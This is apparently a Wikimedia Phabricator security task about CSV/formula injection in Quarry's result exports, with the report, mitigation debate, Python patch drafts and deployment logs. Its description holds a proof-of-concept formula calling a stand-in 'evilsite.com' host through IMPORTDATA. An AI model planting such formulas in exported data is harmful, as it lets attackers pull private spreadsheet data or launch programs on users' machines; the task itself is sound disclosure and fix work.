Maniphest T209226

Quarry can be affected by CSV Injection
Closed, ResolvedPublic
Actions

Assigned To

zhuyifei1999

Authored By

	Framawiki
	Nov 11 2018, 10:07 AM

Description

The "export resultsets" function of Quarry looks not protected against CSV Injection, aka Formula Injection.

https://www.owasp.org/index.php/CSV_Injection
https://pentestmag.com/formula-injection/

For example, this query tested on local dev environment:

select '=IMPORTDATA("https://evilsite.com")';

Will when exported as CSV create a file that contains:

"=IMPORTDATA(""https://evilsite.com"")"
"=IMPORTDATA(""https://evilsite.com"")"

This file, when imported in Google Docs, will load the remote url without warnings.

Malicious code can be hidden in a large request as many are executed.
Since all the Quarry resultsets are public, a data theft using other formulas is not the problem.
According to http://georgemauer.net/2017/10/07/csv-injection.html this can be used to get any other google document that the user has access:

Sheets are not limited to just their own data, in fact they can pull in data from other spreadsheets that the user has access to. All that an attacker has to know is the other sheet’s id. That information isn’t usually considered secret; it appears in the spreadsheet urls, and will often be accidentally emailed, or posted in intra-company documentation, relying on Google’s security to ensure only authorized users access that data.

Finally it seems very likely (not tested) that it is an easy vector to launch arbitrary applications on Windows if the file is opened with Excel as the same blog post says.

Details

	Subject	Repo	Branch	Lines +/-
	SECURITY: escape CSV injections	analytics/quarry/web	master	+32 -2

Customize query in gerrit

Related Objects

Mentioned In: T224300: Extra tab is prepended to quoted fields in TSV output format
Mentioned Here: T192698: Upgrade Quarry to python 3

Event Timeline

Framawiki created this task.Nov 11 2018, 10:07 AM

Restricted Application added a subscriber: Aklapper. · View Herald TranscriptNov 11 2018, 10:07 AM

Framawiki added a project: Quarry.Nov 11 2018, 10:07 AM

Framawiki updated the task description. (Show Details)

Framawiki added a subscriber: zhuyifei1999.

Framawiki renamed this task from Quarry is affected by CSV Injection to Quarry can be affected by CSV Injection.Nov 11 2018, 1:57 PM

Framawiki updated the task description. (Show Details)

So, any way to escape the contents?

In http://georgemauer.net/2017/10/07/csv-injection.html, within the Prevention section, the author discusses placing a \t in front of any field data which may trigger various spreadsheet formulae via the =, -, +, @ chars. I haven't tested that mitigation, but at a cursory glance, it makes sense. Unfortunately it's not without potential consequences, but according to that blog post, it's the only known mitigation to prevent these kinds of attacks.

Are XLSX affected?

I guess we could just downright disable (or show a big warning) CSVs and
TSVs when we see such a prefix in any of the cells, as we simply don’t know
what the downstream consumer might be. It could be a spreadsheet viewer, or
some program that simply process CSVs that wouldn’t expect an extra tab.

Just did some testing in Quarry, downloading xlsx docs (a couple of =( ... ) payloads). Said payloads didn't execute within LibreOffice after the xlsx was opened, but did when imported as an xlsx into Google sheets. Unfortunately, I no longer have a licensed copy of Excel, so I can't test there, but I'd bet the payloads probably execute upon open/import as they did within Google sheets.

sbassett triaged this task as High priority.Nov 26 2018, 5:03 PM

@Framawiki How do you think we should fix this? Add a tab? Or disallow (or give a big warning for) CSV / TSV / XLSX downloads?

Adding a tab might break downstream consumers, but I imagine that would be the easiest.

I'll take a look this week-end on how to deal with this issue.

Create that patch. It escapes with a tabular and add message to end user. Please review:

T209226-001.patch7 KBDownload

Framawiki added a project: Patch-For-Review.Dec 2 2018, 5:03 PM

This will impact the display directly. I would suggest doing the escaping for CSV, TSV, and XLSX only.

In T209226#4792318, @zhuyifei1999 wrote:

This will impact the display directly. I would suggest doing the escaping for CSV, TSV, and XLSX only.

The tabulation prefix is not shown in query view. That is handled by dataTables library that is used like that.
I think it is better to escape the characters for all outputs. I think about a user converting his result file containing hundreds of lines into csv so that he can open it in his spreadsheet. The loss or inconvenience for the user via escapee seems minimal to me, it is not usual to see equals prefixes in cell of wiki tables.

Ok, so do we plan to check all prior result sets for possible injection? I feel like doing the tab-adding in SQLiteResultReader or output.py make more sense to me.

Regarding the specifics of the patch:

+ 'injection_escaped': json.loads(qrun.extra_info)['resultsets'][resultset_id].get('injection_escaped', False)

break this line.

+ for test in TEST_CSV_INJECTION_PREFIXS:
+ if str(element).startswith(test):

if str(element) and str(element)[0] in TEST_CSV_INJECTION_PREFIXS or if any(str(element).startswith(test) for test in TEST_CSV_INJECTION_PREFIXS)

+ if str(element).startswith(test):
+ self._resultsets[self.resultset_id]['injection_escaped'] = True
+ return '\t' + element

I don't think I could trust str(element).startswith(test) to guarantee element being a string, especially considering - is affected. return '\t' + element would fail if not.

I think it's fine to limit the check to basestring only. I don't see how other data types could contain some attack values.

This will impact the display directly. I would suggest doing the escaping for CSV, TSV, and XLSX only.

I'd also prefer to address only the known, affected formats. We probably don't want to perform the \t prepend for things like Wikitable and HTML formats as it's very unlikely (IMO) a user would convert those to a spreadsheet format and the prepend could introduce various unintended formatting issues.

I don't think I could trust str(element).startswith(test) to guarantee element being a string, especially considering - is affected. return '\t' + element would fail if not.

Doesn't str() force a string representation? I thought it tried a few different methods of forcing any object to a string/printable format.

Doesn't str() force a string representation? I thought it tried a few
different methods of forcing any object to a string/printable format.

Yes, however, that is only applied to startswith(). The tab-prepending uses
the element directly.

Also, I don’t think we should add tab for any nagative number in a numeric
representation. Only strings should be excaped.

Ah, yes. I think changing _injection_escape to something like this should work:

def _injection_escape(self, element, remove=False):
    """
    Escape possible CSV injection. T209226
    """
    for test in TEST_CSV_INJECTION_PREFIXS:
        if str(element).startswith(test):
            self._resultsets[self.resultset_id]['injection_escaped'] = True
            if(test == '-' and str(element).lstrip('-').isdigit()):
                break
            else:
                return '\t' + str(element)
    return str(element)

I would suggest just ignore non-basestrings entirely:

def _injection_escape(self, element, remove=False):
    """
    Escape possible CSV injection. T209226
    """
    if not isinstance(element, basestring):
        return element
    # str to convert bytes to unicode
    if not element and str(element)[0] not in TEST_CSV_INJECTION_PREFIXS:
        return element
    self._resultsets[self.resultset_id]['injection_escaped'] = True
    # and try not to convert the type of return value
    return type(element)('\t') + element

That's fine, though basestring is gone in python3. No idea what Quarry uses right now or if there's a push to get to 3 (if it's on 2).

It’s using python 3 right now, after T192698.

For isinstance something like isinstance(element, (str, bytes)) should work.

I tried to get what we want but I didn't get a satisfactory result. @sbassett @zhuyifei1999 Can either of you look for a better implementation? Thanks!

This?

def _injection_escape(self, element, remove=False):
    """
    Escape possible CSV injection. T209226
    """
    if not isinstance(element, (bytes, str)):
        return element
    # str to convert bytes to unicode
    if not element and str(element)[0] not in TEST_CSV_INJECTION_PREFIXS:
        return element
    self._resultsets[self.resultset_id]['injection_escaped'] = True
    # and try not to convert the type of return value
    return type(element)('\t') + element

uh, breaks in Python 3 with bytes. Try this:

def _injection_escape(self, element, remove=False):
    """
    Escape possible CSV injection. T209226
    """
    if not isinstance(element, (bytes, str)):
        return element
    # str to convert bytes to unicode
    if not element and str(element)[0] not in TEST_CSV_INJECTION_PREFIXS:
        return element
    self._resultsets[self.resultset_id]['injection_escaped'] = True
    if isinstance(element, bytes):
        return type(element)(b'\t') + element
    elif isinstance(element, str):
        return type(element)('\t') + element

T209226#4962720 lgtm and works in python3. Though I might add the following:

# str to convert bytes to unicode
if str(element).lstrip(' ').startswith('\t') or \
        (not element and str(element).lstrip()[0] \
         not in TEST_CSV_INJECTION_PREFIXS):
        return element

This should handle these edge cases:

_injection_escape( " \t=BAD()" )  # prevent double-escaping if a tab char already exists at the start
_injection_escape( "  =BAD()" )  # prevent a str with a CSV injection char that's padded by some whitespace

I might also look into adding some unit tests for this project, but that's kind of a separate matter.

How about this?

0001-SECURITY-escape-CSV-injections.patch3 KBDownload

This would only affect the output generation, but is unfortunately silent. I did not reset the commit author (since it was really good commit message).

@zhuyifei1999 - lgtm - though I didn't test in the full context of Quarry - might be able to today or tomorrow. Also not sure how sec patches are typically deployed for high-visibility labs apps. I'd guess it could be done publicly through Gerrit if it was immediately +2'd and deployed.

I could apply the patch immediately on the host and then do gerrit, then sync the host with gerrit. @Framawiki looks fine to you?

@zhuyifei1999 @Framawiki - any update on this? Can we set a date/time to deploy the patch to quarry and backport to gerrit? Happy to help, though I don't currently have access to the quarry project.

Alright, I'll deploy it after I finish lunch today.

https://quarry.wmflabs.org/query/34933

$ curl https://quarry.wmflabs.org/run/359561/output/0/csv
	=1+1
	=1+1

https://gerrit.wikimedia.org/r/#/c/analytics/quarry/web/+/501662/ Merged.

https://tools.wmflabs.org/sal/quarry:

2019-04-05
18:48 	<zhuyifei1999_> 	checked out FETCH_HEAD on quarry-web-01 T209226
18:43 	<zhuyifei1999_> 	applied 0001-SECURITY-escape-CSV-injections.patch on quarry-web-01 and restarted uwsgi T209226